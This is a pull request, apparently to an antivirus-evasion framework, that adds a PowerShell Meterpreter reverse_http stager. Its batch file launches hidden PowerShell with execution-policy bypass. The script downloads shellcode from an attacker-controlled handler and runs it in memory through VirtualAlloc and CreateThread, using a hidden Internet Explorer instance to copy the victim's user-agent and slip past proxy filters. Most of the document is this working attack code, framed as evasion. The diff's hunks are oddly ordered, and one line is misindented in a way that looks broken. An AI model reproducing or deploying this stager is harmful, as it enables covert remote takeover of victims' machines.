### PR TITLE
New powershell reverse http payload that mimics IE user-agent string

### DIFF
--- a/modules/payloads/powershell/meterpreter/rev_http_dyn_useragent.py
+++ b/modules/payloads/powershell/meterpreter/rev_http_dyn_useragent.py
@@ -2,7 +2,13 @@
 
 Custom-written pure powershell meterpreter/reverse_http stager.
 
-Module by @harmj0y
+Original Module by @harmj0y
+Added functionality by @pyrohaz4good
+
+Creates IE object to request a user agent from the MSF handler,
+then establishes the meterpreter session. Useful to avoid detection
+by restrictive proxies who blacklist or whitelist user-agent strings.
+With this, you'll look just like internet explorer.
 
 """
 
@@ -13,7 +19,7 @@ class Payload:
     
     def __init__(self):
         # required options
-        self.description = "pure windows/meterpreter/reverse_http stager, no shellcode"
+        self.description = "pure windows/meterpreter/reverse_http stager, no shellcode, IE pre-stage to mimic user agent string"
         self.rating = "Excellent"
         self.language = "powershell"
         self.extension = "bat"

--- a/modules/payloads/powershell/meterpreter/rev_http_dyn_useragent.py
+++ b/modules/payloads/powershell/meterpreter/rev_http_dyn_useragent.py
@@ -1,0 +1,65 @@
+"""
+
+Custom-written pure powershell meterpreter/reverse_http stager.
+
+Module by @harmj0y
+
+"""
+
+from modules.common import helpers
+
+
+class Payload:
+    
+    def __init__(self):
+        # required options
+        self.description = "pure windows/meterpreter/reverse_http stager, no shellcode"
+        self.rating = "Excellent"
+        self.language = "powershell"
+        self.extension = "bat"
+        
+        # optional
+        self.required_options = {   "LHOST" : ["", "IP of the metasploit handler"],
+                                    "LPORT" : ["8080", "Port of the metasploit handler"],
+                                    "PROXY" : ["N", "Use system proxy settings"]
+                                }
+
+    
+    def generate(self):
+       
+        proxyString = "$pr = [System.Net.WebRequest]::GetSystemWebProxy();$pr.Credentials=[System.Net.CredentialCache]::DefaultCredentials;$m.proxy=$pr;$m.UseDefaultCredentials=$true;"
+        baseString = """$q = @"
+[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+"@
+try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
+function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum %% 0x100 -eq 92)}
+function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}
+function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
+function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}
+$m = New-Object System.Net.WebClient;%s$m.Headers.Add("user-agent", $ua)
+$n = g; [Byte[]] $p = $m.DownloadData("http://%s:%s/$n" )
+$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru
+$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)
+$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %("" if self.required_options["PROXY"][0] == "N" else proxyString,
+                                                                                 self.required_options["LHOST"][0], self.required_options["LPORT"][0])
+	extraBaseString = "\n \
+        $ie = new-object -com \"InternetExplorer.Application\" \n \
+        $ie.visible = $false \n \
+        $ie.navigate(\"http://%s:%s/ECHOUA\") \n \
+        start-sleep 3 \n \
+        $dz = $ie.Document \n \
+        $ua = $dz.body.innerHTML \n \
+        $ie.Quit()\n" %(self.required_options["LHOST"][0], self.required_options["LPORT"][0])
+        baseString = extraBaseString + baseString
+
+
+        encoded = helpers.deflate(baseString)
+
+        payloadCode = "@echo off\n"
+        payloadCode += "if %PROCESSOR_ARCHITECTURE%==x86 ("
+        payloadCode += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"" % (encoded)
+        payloadCode += ") else ("
+        payloadCode += "%%WinDir%%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\")" % (encoded)
+
+        return payloadCode


### PR DESCRIPTION
This is for those times when you manage to bypass AV using veil, but then it turns out the user-agent string is blacklisted by network proxies. This payload first creates a hidden internet explorer instance, navigates to handler and sends an ECHOUA request. The metasploit handler reverse_http will then respond with the user agent of the client visiting the page. This user-agent string is then used to establish the meterpreter connection, the whole time appearing to be normal browsing activity.

**Note: this payload is obviously dependent upon MSF accepting my pull request. In the mean-time, you can check my fork of MSF for the revised handler.  